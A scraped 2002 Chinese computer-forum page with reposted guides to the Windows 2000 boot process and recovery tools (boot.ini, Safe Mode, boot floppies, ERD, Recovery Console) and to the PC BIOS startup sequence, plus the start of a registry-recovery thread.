. D是分区号，第一个编号是1（与适配器和驱动器相反，它们从0开始编号）。

6. 加强b o o t . i n i
你可以通过加强b o o t . i n i文件中的项目来增强操作系统的引导过程。
对b o o t . i n i最常见的变化是将超时时间从3 0秒改为更小的数字（你也可以象我们在本章中说
明的那样，在控制面板的“系统”小程序中进行更改）。
警告有时用户将超时时间设为0，使计算机自动引导默认的操作系统。我们不推荐这样
做，不仅因为它取消了加载以前的操作系统的机会（如果存在），而且还因为它限制了按
F8键显示排除故障菜单的能力。
与Windows NT不同，你不能取消超时限制，必须保留屏幕菜单直到用户做出选择（即使他
永远不选择）。如果编辑b o o t . i n i并将超时限制改为- 1，那么这个限制就会被忽略。在下次引导期
间，超时被复位到以前的状态。
但是，你可以强制菜单停留在屏幕上，直到你准备通过按下除E n t e r键之外的任意键，或使
用方向键加亮显示不同的选项来做出选择。因为它要求用户的干预，所以如果你的目的是将菜
单保留在屏幕上，一直到用户做出选择，那么这不会有什么帮助作用。
你可以在b o o t . i n i的行中添加开关，一些常用的参数包括如下：
. /BASEVIDEO 强制系统进入6 4 0×4 8 0 ,，1 6色的V G A模式。
. / B A U D R ATE=NNNN 设置调试端口的波特率。默认的波特率为1 9 2 0 0，但是9 6 0 0是通过
M o d e m进行远程调试的首选速率。若使用/ B A U D R AT E开关，则自动使用/ D E B U G开关。
. /BOOTLOG 将引导过程的日志写入到% S y s t e m R o o t % \ n t b t l o g . t x t中，日志文件包含了在引
导过程中加载或没有加载的驱动程序清单。
. /CRASHDEBUG 如果Windows 2000崩溃（有停止（ S TO P）错误），则为调试启用C O M
端口，但允许用户为正常的M o d e m操作而继续使用C O M端口。
. /DEBUG 启用内核调试程序，通过C O M端口执行远程实时调试。
. / D E B U G P O RT=COMX 选择一个调试端口。默认情况下，如果存在的话，调试端口是
C O M 2。如果不存在，则默认为C O M 1。
......

7. 隐藏菜单选项
你可以隐藏屏幕菜单选项。例如，如果一台计算机除了安装Windows 2000 外还安装了
Windows 9x，而你可能不希望用户启动以前的操作系统，但又不想删除它（以免将来因为某些
原因需要让用户访问Windows 9x）。这也是一种隐藏已安装的Windows 2000 Server，并允许用户
访问Windows 2000 Professional的方式，反之亦然。
要使菜单项不可访问，在b o o t . i n i文件中，在希望屏幕菜单结束的地方添加[any text]项，那
么该项以下的内容都是不可见和不可访问的。例如，这里有一个禁止用户访问Windows 95的
b o o t . i n i文件：

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINNT
[operating systems]
multi(0)disk(0)rdisk(0)partion(1)\WINNT="Windows 2000 Professional"
[any text]
c:\="Microsoft Windows"

如果想允许访问[any text]以下的项，只要删除[any text]即可。

宠辱不惊，坐看庭前花开花落；去留无意，任天上云卷云舒......

Blueidea Web Team.
Moderator Of Computer Technology Forum

啸

无意
现任版主
积分：6225
发帖：2154
来自：
注册：2000-08-01
 发表于 2002-02-06 22:26:57 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
三、 高级选项菜单
如果操作系统出现引导故障，那么再次重新启动计算机，而且这次使用“高级选项”菜单。
当菜单出现时，注意屏幕底部的一行：
要排除故障并进入Windows 2000的高级启动选项，按F 8键
按F 8键可以显示一个包含如下选项的菜单，它是为帮助用户修复妨碍正常引导的故障而设
计的。
. 安全模式
. 带网络连接的安全模式
. 带命令提示的安全模式
. 启用启动日志
. 启动V G A模式
. 最后一次正确的配置
. 目录服务恢复模式（只适用域控制器）
. 调试模式
注意如果你使用远程安装服务安装Windows 2000，那么高级启动选项可能包含有关R I S
的其他选项。
使用方向键选取要使用的启动选项，然后按回车键，返回最初的引导菜单。然后再选取使
用你所选择的高级选项进行启动的操作系统。
警告如果选取了一个高级选项，那么必须在最初的菜单中选择一个Windows 2000的版本。
不要尝试和以前的Windows版本一起使用任何高级选项。
如果要返回最初的引导菜单，而不选择任何高级选项，那么按E S C键。
5.2.1 安全模式
安全模式最有用的部分是允许访问所有的驱动器，而不管文件系统。如果它可以工作，那
么你可以更改配置来纠正问题。例如，在删除最近安装的不能正常工作的驱动程序，或撤消某
些已实施的配置方案时，通常需要进入安全模式。
. 安全模式只加载基本的文件以及使操作系统启动并运行的驱动程序：鼠标、监视器、键
盘、存储器、基本的视频和默认的系统服务。
. 带网络连接的安全模式添加了网络支持（N I C驱动程序），但是不能在PCMCIA NIC下工
作。
. 带命令提示的安全模式与安全模式一样，除了引导过程以一个命令窗口，而不是G U I结
束。
注意使用任意安全模式选项会导致日志文件写入%SystemRoot%\ntbtlog.txt，参见本节中
的“启用引导日志”。
5.2.2 启用启动日志
这个选项指示Windows 2000创建一个日志文件（ % S y s t e m R o o t % \ n t b t l o g . t x t）。文件显示了
所有加载或没有加载的驱动程序清单。下面是一个典型的n t b t l o g . t x t文件的一小部分（顺便说一
下，这是个U n i c o d e文件）：
5.2.3 启动VGA模式
Windows NT 4用户可能熟悉这个选项，它使用基本的V G A驱动程序启动Windows 2000。为
工作不正常的视频卡（操作系统在下次引导中装载G U I时，它是非常明显的）安装完新的视频驱
动程序后使用这个选项。基本的视频驱动程序和以任何安全模式启动Windows 2000时使用的是
一样的。
5.2.4 最后一次正确的配置
利用这个选项可以使用上次关机时保存在注册表中的设置启动Windows 2000。这个选项能
够解决因驱动程序丢失或崩溃而导致的故障，它对于覆盖由于上次会话中对配置所做的更改而
导致的故障是很有用的。丢弃这些更改通常是一件好事。
5.2.5 目录服务恢复模式
这个选项只能用于域控制器，它恢复% S y s t e m R o o t % S y s v o l目录和Active Directory。S y s v o l
目录存储域的公共文件，它们在域控制器之间复制。
5.2.6 调试模式
使用这个选项启动Windows 2000，并通过串行电缆将调试信息发送到另一台计算机上。

宠辱不惊，坐看庭前花开花落；去留无意，任天上云卷云舒......

Blueidea Web Team.
Moderator Of Computer Technology Forum

啸

无意
现任版主
积分：6225
发帖：2154
来自：
注册：2000-08-01
 发表于 2002-02-06 22:27:28 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
四、 创建引导软盘
如果在操作系统的引导过程中，以前加载的某个文件（ n t l d r、n t d e t e c t . c o m或b o o t . i n i）丢失
或崩溃，则不能进入高级菜单选项来修复系统。你可以通过使用专门为Windows 2000安装创建
的引导盘来解决这个问题。
5.3.1 在自己的系统上创建引导软盘
如果明智的话，只要你的Windows 2000安装一结束并且能运行（无错误），就要创建一个引
导软盘。不幸的是，很少用户能听得进这个忠告，在没有出现引导故障之前，他们认为没有必
要创建引导软盘。尽管如此，如果你是一个机智的、凡事考虑在前的人，那么按如下步骤完成
这项任务：
1 ) 将一张软盘插入到驱动器中。
2) 打开“我的电脑”或“Wi n d o w s资源管理器”，右击软盘驱动器对象。
3) 从快捷方式菜单中选择“格式化”，并使用默认的选项格式化软盘上。
4 ) 将以下文件从硬盘驱动器的根目录复制到软盘上：
. Ntdetect.com
. Ntldr. c o m
. Boot.ini
. Ntbootdd.sys
通过启动操作系统来测试这张软盘。
注意只有存在一个S C S I系统时，才存在n t b o o t d d . s y s文件，它是你重命名的S C S I驱动程
序。
5.3.2 在另一台Windows 2000计算机上创建引导软盘
如果没来得及创建引导软盘，系统就被破坏了，而且你需要引导软盘启动它，那么可以在
另一台运行同样版本（ P r o f e s s i o n a l或其中一个S e r v e r版本）和相同文件系统（ N T F S、FAT或
FAT 3 2）的Windows 2000计算机上创建引导软盘。
1) 按照在自己的计算机上创建引导盘的步骤创建一张引导软盘。
2) 打开b o o t . i n i并检查它，确保它与你自己的配置相匹配。如果不匹配，根据在“关于
b o o t . i n i”一节中的说明调整设置。
3) 如果你有一个不同的S C S I控制器，那么找到正确的驱动程序文件，然后把它复制到软盘
上，删除从创建引导盘的计算机上复制的n t b o o t d d . s y s文件，再把你自己的S C S I驱动程序重命名
为n t b o o t d d . s y s。
4) 如果源计算机使用一个I D E控制器，并且你的系统有一个S C S I控制器，那么使用记事本
调整b o o t . i n i文件中的设置，然后将正确的S C S I 驱动程序复制到软盘，并把它重命名为
n t b o o t d d . s y s。
5) 如果源计算机使用一个S C S I控制器，而且系统中有一个I D E控制器，那么使用记事本调
整b o o t . i n i文件中的设置，如果从源计算机上复制了n t b o o t d d . s y s文件，就将它删除。
在你的计算机上测试引导软盘。
5.3.3 在运行不同Windows版本的计算机上创建引导软盘
如果你找不到运行同一版本的Windows 2000和使用相同文件系统的计算机，你仍然可以创
建用于你的计算机的引导软盘。你需要下列东西：
. 一张空白软盘。
. 1#安装盘（包含在Windows 2000包中的其中一张软盘）。
. Windows 2000的C D - R O M原始介质（如果原始文件在网络服务器上，就不需要C D - R O M）。
. SCSI 控制器的驱动程序文件（如果计算机有一个S C S I控制器）。
注意如果你找不到Windows 2000介质的软盘，可以使用本章后面的“创建Windows 2000
软盘”一节中的介绍的方法来创建它。
你可以在有C D - R O M驱动器（在其中插入Windows 2000的C D - R O M）或能通过网络共享访
问Windows 2000光盘上的文件副本的任何一台计算机来执行这项任务：
1) 在软盘驱动器中插入Windows 2000的第一张安装盘，然后打开“我的电脑”，右击“软盘
驱动器”对象。
2) 从快捷方式菜单中选择“复制磁盘”。
3) 按照提示插入源盘（ 1 #安装盘），然后是目标盘（你的空白软盘），直到复制过程结束。
4) 删除新软盘上的所有文件。
5) 将C D - R O M或网络共享节点i 3 8 6目录下的n t d e t e c t . c o m和n t l d r文件复制到新软盘。
6) 将n t l d r重命名为s e t u p l d r. b i n。
7) 打开记事本并创建一个b o o t . i n i文件，将它保存在新软盘上（见下一节“创建快速的
B o o t . i n i文件）。
8) 如果你的计算机有一个S C S I控制器，那么将正确的驱动程序复制到新软盘上，然后重命
名为n t b o o t d d . s y s。
9) 回到你的计算机上，使用新软盘引导系统，并登录。
10) 将Windows 2000 CD-ROM放到C D - R O M驱动器中，或访问存储Windows 2000文件的网
络共享。
11) 将n t l d r从i 3 8 6目录复制到你的硬盘驱动器的根目录下。
当在没有运行Windows 2000的计算机上创建引导软盘时，我无法解释的一个事实是：你不
能简单地将n t l d r复制到新软盘上并使用它（没有将它重命名）。我试过，在引导过程中，软盘被
访问后立即出现有关n t l d r的错误信息。但按照这里说明的步骤会工作得很好。
5.3.4 创建快速boot.ini文件
你的快速b o o t . i n i文件只加载Windows 2000，所有没有必要担心b o o t . i n i文件中涉及另一个操
作系统的行，即使你的计算机配置成了双重引导。下面是一个示例：
. 如果计算机从I D E或E I D E硬盘驱动器上引导，将s c s i ( 0 )替换成m u l t i ( 0 )。
. 如果Windows 2000系统文件不在名为Wi n n t的目录下，那么使用正确的名称替换这两个实
例。
. 如果有多个控制器、驱动器或分区，那么阅读本章前面的5 . 1 . 8节，确保引用了正确的硬
件。
警告在Windows 2000 Professional中创建的磁盘不能用于Windows 2000 Server，反之亦
然。

宠辱不惊，坐看庭前花开花落；去留无意，任天上云卷云舒......

Blueidea Web Team.
Moderator Of Computer Technology Forum

啸

无意
现任版主
积分：6225
发帖：2154
来自：
注册：2000-08-01
 发表于 2002-02-06 22:28:46 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
五、 创建和使用紧急修复盘（ERD）
Windows 2000处理E R D的创建和使用的方式与以前的Windows NT版本有很大的不同。你会
发现它不如以前的强大（但从另一个方面讲，在Windows 2000中有一些在Windows NT中不存在
的附加的修复和恢复过程）。
5.4.1 ERD的功能
E R D可以帮助修复下列元素出现的故障：
. 系统文件
. 分区的引导扇区
. 双重引导系统的环境设置
不能使用E R D修复注册表故障。
5.4.2 创建ERD
如果你使用过以前的Windows NT，那么可能会对Windows 2000 的E R D功能感到失望。
R d i s k . e x e已经没有了，代之以遍历菜单项目层来创建E R D。
E R D是备份功能集的一部分，若要启动它，单击下列菜单命令：
1) 开始
2) 程序
3) 附件
4) 系统工具
5) 备份
当备份程序窗口打开时，从菜单栏上单击“工具” |“创建一张紧急修复软盘”。这时会打开
一个对话框，要求你在驱动器A中插入一张空白的已格式化软盘。然后，单击“确定”。过了一
会儿，出现一个对话框告诉你修复数据已经成功地保存了。给E R D磁盘贴上标签，并把它放在
一个安全的地方。
E R D中有下列文件：
. Autoexec.bat
. Config.nt
. Setup.log
S e t u p . l o g是一个已加载的文件和驱动程序的清单，其中还有计算机的配置信息，图5 - 2显示
了这个文件的一部分。
图5-2 ERD中的setup.log文件含有系统的配置信息
提示改变系统的配置后应重新创建ERD。
5.4.3 使用ERD
如果操作系统不能引导，可以使用E R D尝试修复安装。如果故障是由系统文件或双重引导
设置的丢失或崩溃造成的，那么这样做通常能修复它。E R D不能修复注册表。
在修复系统时，实际上开始了Windows 2000的另一次安装。
. 如果计算机不能从C D - R O M引导，就使用Windows 2000的1 #安装软盘引导。
. 如果计算机能从C D - R O M引导，可使用Windows 2000的C D或1 #安装软盘。
. 基于A l p h a的计算机必须使用C D。
Windows 2000要完成安装程序。在这个过程的结尾，安装程序发现Windows 2000已经安装
了，因此为用户提供了需要执行修复的选项。这时屏幕上出现一个安装消息，显示如下3个选择：
. 现在安装Windows 2000，按回车键。
. 修复Windows 2000的安装，按R键。
. 退出安装程序，不安装Windows 2000，按F 3键。
按R显示修复菜单，它提供两个选择：
. 使用故障恢复控制台修复Windows 2000安装，按C键。
. 使用紧急修复过程修复Windows 2000安装，按R键。
按R使用紧急修复进程。下一屏包含了一条消息，它实质上是警告你这是一个不确定的过程。
此外，还要求你选择是手工修复（按M键）还是快速修复（按F键）。
手工修复让你决定修复的过程—你可以替换系统文件、分区引导扇区或启动环境。注册表
不能修复。安装程序将要求你在驱动器A中插入E R D。
快速修复将修复过程交给安装程序。安装程序将尝试修复系统文件、分区引导扇区、启动
环境和注册表（注册表修复过程将恢复在首次安装Windows 2000时创建的注册表）。选择完要
安装程序执行的任务后，你会被提示插入E R D。
注意即使你没有E R D，也可以使用这些修复选项中的一个。如果按L，安装程序将搜索
Windows 2000的安装文件。
任务执行完后，重新启动计算机。如果操作系统仍不能启动，就必须重新安装Windows 2000。

宠辱不惊，坐看庭前花开花落；去留无意，任天上云卷云舒......

Blueidea Web Team.
Moderator Of Computer Technology Forum

啸

无意
现任版主
积分：6225
发帖：2154
来自：
注册：2000-08-01
 发表于 2002-02-06 22:30:10 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
六、 故障恢复控制台
故障恢复控制台是一个命令行程序，可用来修复系统故障。虽然这个功能提供了一个有限
的命令集，但是可用来修复M B R、复制丢失或崩溃的系统文件，和重新配置工作不正常（或不
完全正常）的服务。
有两种使用故障恢复控制台的方式：
. 使用Windows 2000安装盘或可引导的Windows 2000 CD进入控制台选项。
. 安装故障恢复控制台，并使它在Windows 2000的引导菜单中可用。
5.5.1 使用安装程序访问故障恢复控制台
当操作系统根本不引导或引导时出现了太多的故障，使你明白显然有问题时，这种方法可
作为一种急救方法。
首先用1 #安装引导盘引导计算机，然后在Windows 2000准备安装它自己的同时，根据提示
插入其他的3张软盘。当最后一张软盘完成它的工作后，一个欢迎安装的消息出现在屏幕上，这
个消息显示3个选项：
. 若要立即安装Windows 2000，按回车键。
. 若要修复Windows 2000的安装，按R键。
. 若要退出安装程序，不安装Windows 2000，按F 3键。
按R显示修复菜单，它提供了两个选择：
. 使用故障恢复控制台修复Windows 2000安装，按C键。
. 使用紧急修复过程修复Windows 2000安装，按R键。
按C键启动Windows 2000的故障恢复控制台（如果在显示出内容之前，出现几秒钟的黑屏，
不要紧张！）。
故障恢复控制台是以文本模式运行的，而且屏幕上显示一个带有编号的操作系统目录列表。
通常情况下只有一个（ C : \ W I N N T），除非你配置了两个不同的Windows 2000版本进行双重引导。
具体步骤如下：
1) 输入你想登录并进行修复的Windows 2000的编号，然后按回车键。
2) 自动登录A d m i n i s t r a t o r，输入A d m i n i s t r a t o r的密码，并按回车键。
3) 进入命令提示符为% S y s t e m R o o t %的目录下，通常是C : \ W I N N T。
现在你可以输入故障恢控制台命令，执行修复任务了。
警告因为你登录的是故障恢复控制台，所以如果安全帐户管理器（SAM）崩溃或丢失了，
则不能使用这个特性。
5.5.2 故障恢复控制台命令
在故障恢复控制台中可使用如下命令：
CD/CHDIR
CHKDSK
CLS
COPY
DEL/DELETE
DIR
DISABLE
ENABLE
DISKPART
FIXBOOT
FIXMBR
FORMAT
LISTSVC
LOGON
MAP
MD/MKDIR
MORE
RD
REN/RENAME
RMDIR
SYSTEMROOT
TYPE
ATTRIB
EXTRACT
这里的大多数命令是常用的M S - D O S命令，有一些你可能不熟悉（输入H e l p / c o m m a n d可了
解有关命令的信息）。使用这些命令可能比较危险，所以计算机新手不要使用故障恢复控制台。
键入E X I T可离开故障恢复控制台，并重新启动计算机。
5.5.3 故障恢复控制台的限制
当你在故障恢复控制台中工作时受到以下限制的制约：
. 你只能访问和查看在开始的屏幕上选择安装Windows 2000的% S y s t e m R o o t %目录（和子目
录）（通常是C : \ W I N N T）。如果你试图查看另一个% S y s t e m R o o t %目录，会看到一个“拒
绝访问”的错误。
. 可以将文件从软盘复制到硬盘。
. 可以在硬盘上将文件从一个位置复制到另一个位置。
. 不能将本地硬盘上的文件复制到软盘上。
5.5.4 安装故障恢复控制台
你可以安装故障恢复控制台，这样当你想加强配置设置和驱动程序（或需要时执行修复）
时，就可以随时使用它了。
安装是用Wi n n t 3 2命令实现的，它在Windows 2000 CD-ROM的\ i 3 8 6文件夹中。输入下面的
命令安装故障恢复控制台。
在这里：X是Windows 2000 CD-ROM的驱动器盘符或Windows 2000安装文件所在的网络共
享的映射驱动器符。f o l d e r n a m e是\ a l p h a或\ i 3 8 6。
安装程序对话框显示了一个将故障恢复控制台作为一个启动选项安装的确认，单击“是”
继续，一个安装向导会负责必要文件的自动安装。你必须重新启动计算机来完成安装。
当操作系统引导时，一个新的选项“ Microsoft Windows 2000命令控制台”出现在菜单中，
它在b o o t . i n i中的项目是：
C : \ C M D C O N S \ B O O T S E C T . D A T = ”Microsoft Windows 2000 命令控制台” / c m d c o n s
5.5.5 卸载故障恢复控制台
你可以按照下面的步骤删除故障恢复控制台和它的菜单项：
1) 编辑b o o t . i n i，删除故障恢复控制台所在的行。
2) 在引导分区的根目录中删除C : \ C m d c o n s目录。
3) 在引导分区的根目录中删除名为Cm l d r的文件。
如果有多个用户要访问一台计算机，而且只要他们中有一个用户属于管理员所担心的“知
道的东西多得足以造成危险”的那类人，那么卸载故障恢复控制台是很有意义的。

宠辱不惊，坐看庭前花开花落；去留无意，任天上云卷云舒......

Blueidea Web Team.
Moderator Of Computer Technology Forum

mao

现任版主
积分：1694
发帖：691
来自：北京
注册：2000-07-23
 发表于 2002-02-06 23:50:03 按此观看mao的个人资料 按此发邮件给mao 访问mao的主页 mao 的 oicq 是20801171,查看 20801171 的资料 发送悄悄话给mao 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看mao的IP
大家有必要看看这篇文章，可以让我们这些天天用计算机的人了解一下系统是怎么的一个启动过程，这样大家在以后遇到这样的问题时可以试着这样修复一下。我觉得是非常有用的

解决问题才有进步
解决问题才有进步
上一贴 | 下一贴
快速回复 主题：深入了解Win2000 引导与启动 （转）
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


计算机启动过程详解(转) - 经 典 论 坛

计算机技术
计算机启动过程详解(转)

上一贴 | 下一贴
发表人 主题: 计算机启动过程详解(转)
话草

终级用户
积分：688
发帖：223
来自：
注册：2001-08-07
 发表于 2002-02-07 10:34:01 按此观看话草的个人资料 按此发邮件给话草 话草 的 oicq 是27721384,查看 27721384 的资料 收藏该主题供以后查看 发送悄悄话给话草 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看话草的IP
打开电源启动机器几乎是电脑爱好者每天必做的事情，面对屏幕上出现的一幅幅启动画面，我们一点儿也不会感到陌生，但是，计算机在显示这些启动画面时都做了些什么工作呢？相信有的朋友还不是很清楚，本文就来介绍一下从打开电源到出现Windows 9x的蓝天白云时，计算机到底都干了些什么事情。

    首先让我们来了解一些基本概念。第一个是大家非常熟悉的BIOS（基本输入输出系统），BIOS是直接与硬件打交道的底层代码，它为操作系统提供了控制硬件设备的基本功能。BIOS包括有系统BIOS（即常说的主板BIOS）、显卡BIOS和其它设备（例如IDE控制器、SCSI卡或网卡等）的BIOS，其中系统BIOS是本文要讨论的主角，因为计算机的启动过程正是在它的控制下进行的。BIOS一般被存放在ROM(只读存储芯片)之中，即使在关机或掉电以后，这些代码也不会消失。

    第二个基本概念是内存的地址，我们的机器中一般安装有32MB、64MB或128MB内存，这些内存的每一个字节都被赋予了一个地址，以便CPU访问内存。32MB的地址范围用十六进制数表示就是0～1FFFFFFH，其中0～FFFFFH的低端1MB内存非常特殊，因为最初的8086处理器能够访问的内存最大只有1MB，这1MB的低端640KB被称为基本内存，而A0000H～BFFFFH要保留给显示卡的显存使用，C0000H～FFFFFH则被保留给BIOS使用，其中系统BIOS一般占用了最后的64KB或更多一点的空间，显卡BIOS一般在C0000H～C7FFFH处，IDE控制器的BIOS在C8000H～CBFFFH处。

    好了，下面我们就来仔细看看计算机的启动过程吧。

    第一步： 当我们按下电源开关时，电源就开始向主板和其它设备供电，此时电压还不太稳定，主板上的控制芯片组会向CPU发出并保持一个RESET（重置）信号，让CPU内部自动恢复到初始状态，但CPU在此刻不会马上执行指令。当芯片组检测到电源已经开始稳定供电了（当然从不稳定到稳定的过程只是一瞬间的事情），它便撤去RESET信号（如果是手工按下计算机面板上的Reset按钮来重启机器，那么松开该按钮时芯片组就会撤去RESET信号），CPU马上就从地址FFFF0H处开始执行指令，从前面的介绍可知，这个地址实际上在系统BIOS的地址范围内，无论是Award BIOS还是AMI BIOS，放在这里的只是一条跳转指令，跳到系统BIOS中真正的启动代码处。

    第二步： 系统BIOS的启动代码首先要做的事情就是进行POST（Power－On Self Test，加电后自检），POST的主要任务是检测系统中一些关键设备是否存在和能否正常工作，例如内存和显卡等设备。由于POST是最早进行的检测过程，此时显卡还没有初始化，如果系统BIOS在进行POST的过程中发现了一些致命错误，例如没有找到内存或者内存有问题（此时只会检查640K常规内存），那么系统BIOS就会直接控制喇叭发声来报告错误，声音的长短和次数代表了错误的类型。在正常情况下，POST过程进行得非常快，我们几乎无法感觉到它的存在，POST结束之后就会调用其它代码来进行更完整的硬件检测。

    第三步： 接下来系统BIOS将查找显卡的BIOS，前面说过，存放显卡BIOS的ROM芯片的起始地址通常设在C0000H处，系统BIOS在这个地方找到显卡BIOS之后就调用它的初始化代码，由显卡BIOS来初始化显卡，此时多数显卡都会在屏幕上显示出一些初始化信息，介绍生产厂商、图形芯片类型等内容，不过这个画面几乎是一闪而过。系统BIOS接着会查找其它设备的BIOS程序，找到之后同样要调用这些BIOS内部的初始化代码来初始化相关的设备。

    第四步： 查找完所有其它设备的BIOS之后，系统BIOS将显示出它自己的启动画面，其中包括有系统BIOS的类型、序列号和版本号等内容。

    第五步： 接着系统BIOS将检测和显示CPU的类型和工作频率，然后开始测试所有的RAM，并同时在屏幕上显示内存测试的进度，我们可以在CMOS设置中自行决定使用简单耗时少或者详细耗时多的测试方式。

    第六步： 内存测试通过之后，系统BIOS将开始检测系统中安装的一些标准硬件设备，包括硬盘、CD－ROM、串口、并口、软驱等设备，另外绝大多数较新版本的系统BIOS在这一过程中还要自动检测和设置内存的定时参数、硬盘参数和访问模式等。

    第七步： 标准设备检测完毕后，系统BIOS内部的支持即插即用的代码将开始检测和配置系统中安装的即插即用设备，每找到一个设备之后，系统BIOS都会在屏幕上显示出设备的名称和型号等信息，同时为该设备分配中断、DMA通道和I/O端口等资源。

    第八步： 到这一步为止，所有硬件都已经检测配置完毕了，多数系统BIOS会重新清屏并在屏幕上方显示出一个表格，其中概略地列出了系统中安装的各种标准硬件设备，以及它们使用的资源和一些相关工作参数。

    第九步： 接下来系统BIOS将更新ESCD（Extended System Configuration Data，扩展系统配置数据）。ESCD是系统BIOS用来与操作系统交换硬件配置信息的一种手段，这些数据被存放在CMOS（一小块特殊的RAM，由主板上的电池来供电）之中。通常ESCD数据只在系统硬件配置发生改变后才会更新，所以不是每次启动机器时我们都能够看到“Update ESCD… Success”这样的信息，不过，某些主板的系统BIOS在保存ESCD数据时使用了与Windows 9x不相同的数据格式，于是Windows 9x在它自己的启动过程中会把ESCD数据修改成自己的格式，但在下一次启动机器时，即使硬件配置没有发生改变，系统BIOS也会把ESCD的数据格式改回来，如此循环，将会导致在每次启动机器时，系统BIOS都要更新一遍ESCD，这就是为什么有些机器在每次启动时都会显示出相关信息的原因。

    第十步： ESCD更新完毕后，系统BIOS的启动代码将进行它的最后一项工作，即根据用户指定的启动顺序从软盘、硬盘或光驱启动。以从C盘启动为例，系统BIOS将读取并执行硬盘上的主引导记录，主引导记录接着从分区表中找到第一个活动分区，然后读取并执行这个活动分区的分区引导记录，而分区引导记录将负责读取并执行IO.SYS，这是DOS和Windows 9x最基本的系统文件。Windows 9x的IO.SYS首先要初始化一些重要的系统数据，然后就显示出我们熟悉的蓝天白云，在这幅画面之下，Windows将继续进行DOS部分和GUI（图形用户界面）部分的引导和初始化工作。

    如果系统之中安装有引导多种操作系统的工具软件，通常主引导记录将被替换成该软件的引导代码，这些代码将允许用户选择一种操作系统，然后读取并执行该操作系统的基本引导代码（DOS和Windows的基本引导代码就是分区引导记录）。 　　上面介绍的便是计算机在打开电源开关（或按Reset键）进行冷启动时所要完成的各种初始化工作，如果我们在DOS下按Ctrl＋Alt＋Del组合键（或从Windows中选择重新启动计算机）来进行热启动，那么POST过程将被跳过去，直接从第三步开始，另外第五步的检测CPU和内存测试也不会再进行。我们可以看到，无论是冷启动还是热启动，系统BIOS都一次又一次地重复进行着这些我们平时并不太注意的事情，然而正是这些单调的硬件检测步骤为我们能够正常使用电脑提供了基础。

仿啸

话草

终级用户
积分：688
发帖：223
来自：
注册：2001-08-07
 发表于 2002-02-07 17:20:07 按此观看话草的个人资料 按此发邮件给话草 话草 的 oicq 是27721384,查看 27721384 的资料 发送悄悄话给话草 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看话草的IP
可以置顶吗
啸

无意
现任版主
积分：6225
发帖：2154
来自：
注册：2000-08-01
 发表于 2002-02-07 20:24:17 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
首先谢谢你的热心和对计算机版的支持，不过上面那个我的帖子不是我置顶的，我不大喜欢太多的文章置顶，总觉得这样会影响其他的朋友提问，如果大家觉得这样不好，可以提出来，我将按照大家的意愿做。
最近我也一直在想应该怎么方便大家浏览这样的教程而又不影响朋友的提问，但也没想到什么好的办法,目前能做到的就是来个教程分类汇总，全部集中在一个帖子里一起置顶，不过这样也不是直观，不知道朋友们有没有什么好的建议，不妨说说

宠辱不惊，坐看庭前花开花落；去留无意，任天上云卷云舒......

Blueidea Web Team.
Moderator Of Computer Technology Forum

话草

终级用户
积分：688
发帖：223
来自：
注册：2001-08-07
 发表于 2002-02-08 09:20:30 按此观看话草的个人资料 按此发邮件给话草 话草 的 oicq 是27721384,查看 27721384 的资料 发送悄悄话给话草 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看话草的IP
伤脑筋

一切以方便朋友为主吧

上一贴 | 下一贴
快速回复 主题：计算机启动过程详解(转)
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


注册表完全恢复手册（因我本人非常喜欢注册表） - 经 典 论 坛

计算机技术
注册表完全恢复手册（因我本人非常喜欢注册表）

上一贴 | 下一贴
发表人 主题: 注册表完全恢复手册（因我本人非常喜欢注册表）
鸵鸟γδξπηφ

高级用户
积分：219
发帖：55
来自：
注册：2002-01-27
 发表于 2002-01-29 09:02:49 按此观看鸵鸟γδξπηφ的个人资料 按此发邮件给鸵鸟γδξπηφ 收藏该主题供以后查看 发送悄悄话给鸵鸟γδξπηφ 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看鸵鸟γδξπηφ的IP

注册表是伴随着Win95出现在我们面前的，其实它早就在NT中担当起了重要的作用。采用注册表来管理系统配置，主要是为了提高系统的稳定性。而系统出现的一些问题（如无法启动、应用程序无法运行、系统工作不正常等），很多都是因注册表出现错误而造成的，通过修改相应的错误数据就能使得Windows工作如初了。但注册表的结构太复杂，不正确的修改常常会带来更坏的结果。下面介绍几种安全恢复注册表的方法，希望能帮助大家远离令人头疼的注册表问题。

未 雨 绸 缪 篇

